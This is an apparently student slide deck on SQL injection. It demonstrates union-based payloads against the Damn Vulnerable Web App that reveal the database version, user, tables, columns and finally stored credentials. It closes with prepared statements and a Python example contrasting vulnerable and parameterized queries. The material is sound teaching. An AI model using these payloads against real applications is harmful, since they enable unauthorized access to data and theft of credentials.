Slide 1: SQL Injection, by Wenonah Abadilla
Slide 2: Topics
What is SQL
What is SQL Injection
Damn Vulnerable Web App
SQLI Demo
Prepared Statements
Slide 3: What is SQL?
Structured Query Language: the way you communicate with a database.
Used to access and manipulate databases.
COSC 341 at IUP
Slide 4: What is SQL Injection?
One of the most serious threats to web applications.
SQL commands are injected into an SQL statement via web page input, altering the statement and compromising the security of the web application.
Common in PHP and ASP applications because of the prevalence of older functional database interfaces.
Occurs when data enters a program from an untrusted source and that data is used to dynamically construct an SQL query.
SQL injection harvesting: crafting SQL statements so that the application renders sensitive data.
Slide 5: Types of SQLI
Error based: causes an error and gathers information from the error message.
Union based: combines two or more SQL statements into one result set.
Blind: asks the database a true-or-false question and infers the answer from the response.
Slide 6: Consequences of SQL Injection
Confidentiality
Authentication
Authorization
Integrity
Slide 7: Damn Vulnerable Web App (DVWA) Demo
A PHP/MySQL web application.
An aid for security professionals to test their skills and tools in a legal environment.
Helps developers better understand the process of securing web applications.
Slide 8: The vulnerable query
// $id comes straight from the request and is interpolated into the SQL string unescaped
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
Slide 9: Basic Injection
The web page is supposed to print the ID, first name and surname. With the input 1, the query becomes:
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '1'";
Slide 10: Always True Scenario
The query now says: display all records for which the condition is false and all records for which it is true.
%' is probably not equal to anything, so it is false.
'0'='0' is true, because 0 will always equal 0.
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0'";
Slide 11: Display Database Version
Notice the last displayed line: this is the version of the MySQL database.
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, version() # ";
Slide 12: Display Database User
Notice the last displayed line: the name of the database user that executed the behind-the-scenes PHP code.
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, user() # ";
Slide 13: Display Database Name
Notice the last displayed line: this is the name of the database.
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, database() # ";
Slide 14: Display All Tables in the information_schema
Displays all the tables in the information_schema database.
INFORMATION_SCHEMA is the informational database: it stores information about all the other databases that the MySQL server maintains.
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, table_name from information_schema.tables #";
Slide 15: Display All User Tables in the information_schema
Displays all tables whose names start with the prefix "user" in the information_schema database.
Quicker than reading through the previous output and looking for the user table by hand.
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, table_name from information_schema.tables where table_name like 'user%' #";
Slide 16: Display All Column Fields in the Users Table
Displays all the columns in the users table. Notice the user_id, first_name, last_name, user and password columns.
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #";
Slide 17: Display Column Field Contents in the Users Table
Successfully displayed all the authentication information stored in the database.
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #";
Slide 18: Prepared Statements and Bound Parameters
The query and the data are sent to the SQL server separately.
Also called parameterized statements or parameterized SQL: a template for an SQL statement.
Values are plugged into the query after the query has been "prepared" and is ready to be executed.
Bound parameters (?) are the placeholders where the actual values are plugged in.
Slide 19: Examples
PHP using PDO
Java using JDBC
In both, the statement sets each "?" to an actual value, the one stored in the id variable.
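The following is an added example, not code from the presentation or from DVWA. It puts the vulnerable pattern of slide 8 (user input interpolated into the query string) beside the bound-parameter pattern of slides 18 and 19, and runs both against a constructed in-memory SQLite database with a users table shaped like DVWA's, so that the always-true input from slide 10 can be tried against each. SQLite's `?` placeholders play the same role as PDO's bound parameters; SQLite stands in for MySQL only so the example runs offline.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a small in-memory users table (constructed sample data, not DVWA's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Same shape as $getid on slide 8: the request value becomes part of the SQL text.

    Anything the user types is parsed by the database as SQL, so a quote in the
    input ends the literal and the rest of the input is executed as a condition.
    """
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_prepared(conn: sqlite3.Connection, user_id: str) -> list:
    """Prepared statement: the template is fixed, the value is bound to the ? placeholder.

    The database receives the statement and the data separately; the input is
    compared as a literal string and is never parsed as SQL, so the slide 10
    payload simply fails to match any user_id.
    """
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    always_true = "%' or '0'='0"  # the always-true input from slide 10
    print("normal input, vulnerable:", lookup_vulnerable(db, "1"))
    print("payload, vulnerable:     ", lookup_vulnerable(db, always_true))
    print("normal input, prepared:  ", lookup_prepared(db, "1"))
    print("payload, prepared:       ", lookup_prepared(db, always_true))
```

Run stand-alone, the vulnerable lookup returns every row for the always-true input, while the prepared lookup returns nothing for it and still returns the single expected row for a legitimate ID. The fix is not input filtering: the bound parameter makes the SQL structure independent of the data.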
Slide 20: Conclusion
SQLI is a huge threat to web applications.
Use prepared SQL statements.
Download Damn Vulnerable Web App.
Questions?